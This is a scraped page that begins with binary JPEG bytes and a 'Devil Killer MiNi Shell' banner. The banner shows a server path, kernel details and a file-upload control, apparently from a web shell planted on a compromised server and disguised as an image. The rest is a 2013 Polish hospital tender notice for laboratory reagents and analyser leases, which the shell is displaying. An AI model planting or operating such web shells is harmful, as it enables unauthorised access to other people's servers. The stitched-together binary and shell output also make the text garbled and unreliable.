JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131018/218191-N-2013.html

<p class="kh_header"><b>Oleśnica: Dostawa odczynników do oznaczania grup krwi, szybkich testów kasetkowych, odczynników i materiałów do badań układu krzepnięcia wraz z dzierżawą koagulometru, dostawa podłoży płynnych do posiewów krwi i płynów ustrojowych oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych, dostawa materiałów do wykonywania badań z zakresu mikrobiologii, dostawa pasków do badań fizykochemicznych i sprzętu do analizy osadu moczu wraz z dzierżawą dwóch czytników do moczu dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy.</b><br>
<b>Numer ogłoszenia: 218191 - 2013; data zamieszczenia: 18.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników do oznaczania grup krwi, szybkich testów kasetkowych, odczynników i materiałów do badań układu krzepnięcia wraz z dzierżawą koagulometru, dostawa podłoży płynnych do posiewów krwi i płynów ustrojowych oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych, dostawa materiałów do wykonywania badań z zakresu mikrobiologii, dostawa pasków do badań fizykochemicznych i sprzętu do analizy osadu moczu wraz z dzierżawą dwóch czytników do moczu dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników do oznaczania grup krwi metodą manualną, dostawa szybkich testów kasetkowych do równoczesnego wykrywania antygenu dehydrogenazy glutaminianowej (GDH) oraz toksyn A i B Clostridium difficile, dostawa odczynnikach i materiałów do badań układu krzepnięcia wraz z dzierżawą koagulometru, dostawa podłoży płynnych do posiewów krwi i płynów ustrojowych do automatycznego systemu do hodowli drobnoustrojów oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych, dostawa materiałów do wykonywania badań z zakresu mikrobiologii, dostawa pasków do badań fizykochemicznych i sprzętu do analizy osadu moczu wraz z dzierżawą dwóch czytników do moczu dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy. 
Szczegółowy opis przedmiotu zamówienia zawierają załączniki nr 2-7 do SIWZ.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - dostawa odczynników do oznaczania grup krwi metodą manualną
Pakiet nr 2 - dostawa szybkich testów kasetkowych do równoczesnego wykrywania antygenu dehydrogenazy glutaminianowej (GDH) oraz toksyn A i B Clostridium difficile
Pakiet nr 3 - dostawa odczynników i materiałów do badań układu krzepnięcia wraz z dzierżawą koagulometru
Pakiet nr 4 - dostawa podłoży płynnych do posiewów krwi i płynów ustrojowych do automatycznego systemu do hodowli drobnoustrojów oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych
Pakiet nr 5 - dostawa materiałów do wykonywania badań z zakresu mikrobiologii
Pakiet nr 6 - dostawa pasków do badań fizykochemicznych i sprzętu do analizy osadu moczu wraz z dzierżawą dwóch czytników.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.65.00-0, 33.69.62.00-7, 33.12.41.30-5, 33.12.41.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) deklaracja CE do każdego produktu - jeżeli jest wymagana
b) ulotki zawierające opis oferowanych odczynników i materiałów zużywalnych
c) do oferty należy dołączyć dokumenty potwierdzające spełnienie warunków/parametrów wymaganych oraz ocenianych.
d) metodyki oznaczeń i/lub inne materiały opisujące m.in. wymaganą procedurą kalibracji i kontroli analizatora
e) dokumenty, o których mowa w punkcie 8, 11, 12, 16 Zestawienia parametrów aparatu do posiewów krwi oraz płynów ustrojowych (załącznik nr 5 do SIWZ, Pakiet nr 4)
f) dokumenty, o których mowa w punkcie 35, 36, 37 Karty spełniania warunków przedmiotu zamówienia - wymagane parametry czytnika pasków do moczu (załącznik nr 7 do SIWZ, Pakiet nr 6)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełniony formularz asortymentowo-cenowy (odpowiednio załącznik nr 2-7 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
c) oświadczenie, że Wykonawca posiada w zakresie oferowanych wyrobów dokumenty zezwalające na ich wprowadzenie do obrotu i stosowania. 
d) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy na dostawę odczynników wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych i strony postanawiają, że jedyna dopuszczalna zmiana warunków umowy może dotyczyć ceny w części dotyczącej zmiany stawki podatku VAT oraz w przypadku niewyczerpania przez Zamawiającego wartości umowy w okresie jej trwania, Strony mają prawo do przedłużenia terminu obowiązywania umowy, bez zwiększania jej wartości. Strony dopuszczają również zmianę warunków umowy w zakresie numeru katalogowego produktu i nazwy produktu przy zachowaniu jego parametrów.
Zmiany umowy na dzierżawę anlizatorów wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych i strony postanawiają, że jedyna dopuszczalna zmiana warunków umowy może dotyczyć ceny w części dotyczącej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 11:30, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odczynniki do oznaczania grup krwi metodą manualną dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Odczynnik monoklonalny anty A klon I - 280 ml
2.Odczynnik monoklonalny anty A klon II - 300 ml
3.Odczynnik monoklonalny anty B klon I - 	280 ml
4.Odczynnik monoklonalny anty B klon II - 300 ml
5.Odczynnik monoklonalny anty D IgM - 400 ml
6.Odczynnik monoklonalny anty D IgM+IgG - 350 ml
7.Standard anty-D - 60 ml
8.Standaryzowane krwinki wzorcowe do układu AB0 - 65 Zestawów 3x4 ml

Warunki graniczne (wymagane) dot. Pakietu nr 1
1. Odczynniki monoklonalne anty-A i anty-B, z przeciwciałami klasy IgM pochodzącymi z dwóch różnych klonów komórkowych
2.Odczynnik monoklonalny anty-D z przeciwciałami klasy IgM reagującymi także z antygenem D słabe (DU), nie rozpoznającymi kategorii DVI antygenu D
3.Odczynnik monoklonalny anty-D z przeciwciałami klasy IgM i IgG pochodzącymi z hybrydowej hodowli komórkowej reagującymi także z antygenem D słabe (DU), rozpoznającymi także kategorię DVI antygenu D
4.Płynny Standard anty-D zawierający przeciwciała anty-D klasy IgG w stężeniu 0,1 IU IgG anty-D/ml (0,02ug/ml) 
5.Standaryzowane krwinki wzorcowe do układu AB0 - Gotowe do użycia bez dodatkowego przygotowania
Zestaw zawierający krwinki grup:
0
A1
B
Wśród krwinek wchodzących w skład zestawu powinny znajdować się krwinki Rh D + (dodatnie), oraz Rh D - (ujemne). 
Krwinki zawieszone w roztworze konserwującym zabezpieczającym przed hemolizą stanowiącym jednocześnie środowisko reakcji (Zamawiający nie dopuszcza możliwości odpłukiwania krwinek i przygotowywania ich do użycia)  i zachowującym właściwości krwinek w okresie ważności zestawu (Zamawiający nie dopuszcza możliwości odpłukiwania krwinek i przygotowywania ich do użycia w przypadku wystąpienia hemolizy), w stężeniu umożliwiającym ich bezpośrednie użycie.
6.Wszystkie odczynniki konfekcjonowane w buteleczki z zakraplaczem umożliwiającym precyzyjne dozowanie odczynnika. Odczynniki z pozycji 1-7 konfekcjonowane w buteleczkach o maksymalnej objętości 10 ml 
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty. 
Parametry oceniane
maksymalny czas reakcji odczynnika z badanymi krwinkami 
punktacja
5 min - 15 pkt
> 5 min - 0 pkt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. ocena  odczynników - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Szybkie testy kasetkowe do równoczesnego wykrywania antygenu dehydrogenazy glutaminianowej (GDH) oraz toksyn A i B Clostridium difficile dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szybki test immunoenzymatyczny kasetkowy do równoczesnego wykrywania antygenu dehydrogenazy glutaminianowej (GDH) oraz toksyn A i B Clostridium difficile na jednej kasetce - ilość: 500 testów
Warunki graniczne (wymagane) dot. Pakietu nr 2
1.Wielkość opakowania - 25 testów
2.Płytka jednostudzienkowa - jeden dołek/studzienka do dozowania próbki
3.Wykrywalność toksyny A - nie gorsza niż 0,7 ng/ml
4.Wykrywalność toksyny B - nie gorsza niż 0,2 ng/ml
5.Wykrywalność GDH - nie gorsza niż 0,8 ng/ml
6.Kontrola dodatnia (antygen) zawarta w zestawie
7.Wszystkie wymagane powyżej parametry testu muszą być potwierdzone w załączonej metodyce
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wraz z dzierżawą koagulometru dla laboratorium w Sycowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki i materiały zużywalne
Zestaw do oznaczania czasu protrombinowego - PT - ilość: 7000 oznaczeń
1. Tromboplastyna z mózgu królika, odczynnik ciekły
2. Chlorek wapnia w zestawie
3. Wartość ISI oraz średni czas prawidłowy wyznaczone przez producenta odczynników na oferowany aparat
4. objętość fiolki z tromboplastyną do 5,0 ml
5. stabilność odczynnika roboczego minimum 10 dni w temperaturze 2-6°C
6. możliwość przygotowania dowolnych ilości odczynnika roboczego
Zestaw do oznaczania czasu kaolinowo-kefalinowego - APTT - ilość: 700 oznaczeń
1.  Odczynnik ciekły z kwasem elagowym
2. objętość fiolki z odczynnikiem do 5,0 ml
3.  chlorek wapnia w zestawie 
4. odczynnik po otwarciu stabilny do daty ważności w temperaturze 2-6°C
Osocze kontrolne do czasu protrombinowego - poziom I
1. Osocze normalne z wyznaczonymi parametrami do powyższych zestawów (1-3)
2. Stabilność kontroli po rozpuszczeniu - min. 8 godz. w temperaturze 2-6°C
3. Wartość materiału kontrolnego wyznaczone przez producenta odczynników na oferowany aparat
4. Objętość fiolki do 1,0 ml
Osocze kontrolne do czasu protrombinowego - poziom II
1. Osocze patologiczne z wyznaczonymi parametrami do powyższych zestawów (1-3)
2. Stabilność kontroli po rozpuszczeniu - min. 8 godz. w temperaturze 2-6°C
3. Wartość materiału kontrolnego wyznaczone przez producenta odczynników na oferowany aparat
4. Objętość fiolki do 1,0 ml
Probówki do koagulometru - 7700 szt.
Ilości oznaczeń i ilości probówek Wykonawca powinien powiększyć o ilość potrzebną do wykonania codziennej kontroli na dwóch poziomach. Wykonawca zobowiązany jest wyliczyć wartość oferty uwzględniając wielkość i zaokrąglając w górę do pełnego opakowania.
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający dla prawidłowego wykonania w/w ilości oznaczeń. W przypadku nieuwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do zamawiającego.

Wymagane parametry koagulometru dot. Pakietu nr 3
1.Koagulometr dwukanałowy, z możliwością wykonania jednocześnie dwóch różnych oznaczeń, u różnych pacjentów lub w dublecie z podawaniem wartości średniej
2.Koagulometr, odczynniki i materiały kontrolne - tego samego producenta
3.Metoda pomiaru: krzepnięcia, chromogenna i immunoturbidymetryczna
4.Eliminacja inteferencji ze strony próbek lipemicznych i żółtaczkowych
5.Min 12 termostatowanych pozycji na próbki
6.Min 3 termostatowane pozycje na odczynniki
7.Automatyczne rozpoczęcie badania wywołane dodaniem odczynnika
8.Min 5 punktowa krzywa kalibracyjna
9.Automatyczne flagowanie próbek krytycznych
10.Koagulometr posiada złącze RS 232
11.Dedykowane oprogramowanie komputerowe w języku polskim umożliwiające automatyczne wysyłanie wyników z koagulometru do komputera, będące jednocześnie bazą danych wyników oraz pozwalające na wydruk wyników z programu
12.Automatyczne przeliczanie wyników badań (w sekundach, procentach, INR, g/l, ng/dl, mOD, wskaźnik protrombinowy %)
13.Automatyczny program samokontroli układu optycznego i mechanicznego aparatu
14.Mieszadło magnetyczne dla pozycji odczynnikowej
15.Zużycie odczynnika dla APTT do 25 ul., dla PT do 50 ul.
16.Możliwość wykonywania w przyszłości fibrynogenu i d-dimerów
17.Deklaracja zgodności CE wraz z ofertą
18.Włączenie koagulometru w laboratoryjny system informatyczny e-LAB Eclipse na koszt Wykonawcy
Wraz z koagulometrem dostarczony komputer i czytnik kodów kreskowych
Instrukcja obsługi aparatu i metodyki wykonania testów wraz z ofertą
19.Gwarancja w okresie trwania umowy
20.Udział w statystycznej kontroli jakości STANDLAB na koszt Wykonawcy
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 38.43.45.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Podłoża płynne do posiewów krwi i płynów ustrojowych do automatycznego systemu do hodowli drobnoustrojów oraz dzierżawa automatycznego systemu do posiewów krwi i płynów ustrojowych dla laboratorium w Sycowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Podłoża do hodowli tlenowej - 400 butelek
2. Podłoża do hodowli beztlenowej - 100 butelek
3. Podłoża do hodowli tlenowej z inhibitorem antybiotyku - 400 butelek
4. Podłoża pediatryczne - 250 butelek
5.Podłoża selektywne do hodowli grzybów z inhibitorem wzrostu bakterii - 50 butelek
6.Igła dwustronna z adapterem na butelkę do wysiewu dodatnich próbek krwi - 50 szt.50
ZESTAWIENIE PARAMETRÓW APARATU DO POSIEWÓW KRWI ORAZ PŁYNÓW USTROJOWYCH 
1.Ilość miejsc inkubacyjno-pomiarowych w aparacie  50-60
2.Odczyt badanych (monitorowanych) próbek w aparacie poprzez system fotodetektorów min. co 10 minut
3.Wprowadzanie danych o numerze badania czytnikiem kodów paskowych (dostępna opcja wprowadzania butelek z uszkodzonym kodem kreskowym)
4.Natychmiastowa sygnalizacja próby dodatniej-sygnał dźwiękowy i świetlny
5.Zmiana czasu inkubacji na życzenie operatora 
a.dla danego rodzaju podłoża
b.dla pojedynczej butelki
6Dostępne podłoża standardowe do hodowli drobnoustrojów tlenowych oraz beztlenowych
7.Dostępne podłoża do hodowli drobnoustrojów w próbkach pacjentów poddanych antybiotykoterapii-podłoża z inhibitorem stosowanych antybiotyków
8.Dostępne podłoża do hodowli i detekcji wzrostu drobnoustrojów w próbkach pediatrycznych oraz płynie mózgowo-rdzeniowym (mała ilość materiału-  0,5-5 ml) - dołączyć materiały informacyjne producenta
9.Możliwość hodowli drożdżaków i grzybów na wybiórczych podłożach z antybiotykami hamującymi wzrost bakterii (zminimalizowanie czasu hodowli tych drobnoustrojów-nawet do 44h- możliwość wykrycie równolegle przebiegającej bakteriemii i fungemii)
10.Podłoża dostosowane do próżniowego pobierania krwi bezpośrednio do butelek za pomocą specjalnych zestawów - (uchwyt + wężyk + igła motylkowa) - kompatybilność butelek z systemami próżniowymi pobierania krwi dostępnymi na ryku ( brak konieczności stosowania przekładek, adapterów)
11.Możliwość opóźnionego wkładania butelek do aparatu (do 48h) bez uszczerbku na wykrywalności drobnoustrojów-dołączyć deklarację producenta 
12.Możliwość wdrożenia procedury inokulacji testów do identyfikacji oraz oceny lekowrażliwości bezpośrednio z pozytywnych podłoży hodowlanych- dołączyć procedurę producenta 
13.Podłoża do systemu z możliwością przechowywania w temperaturze pokojowej 
14.Aparat wyposażony w UPS stabilizujący napięcie w przypadku awarii sieci energetycznej
15.Bezpłatne przeprowadzenie szkoleń personelu z obsługi aparatu po instalacji 
16.Instrukcja obsługi urządzenia oraz opisy podłoża w j. polskim wraz z dostawą aparatu
Niespełnienie choćby jednego wymaganego parametru spowoduje odrzucenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.30-5, 33.12.41.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 -  Materiały do wykonywania badań z zakresu mikrobiologii dla laboratorium w Sycowie..</p>
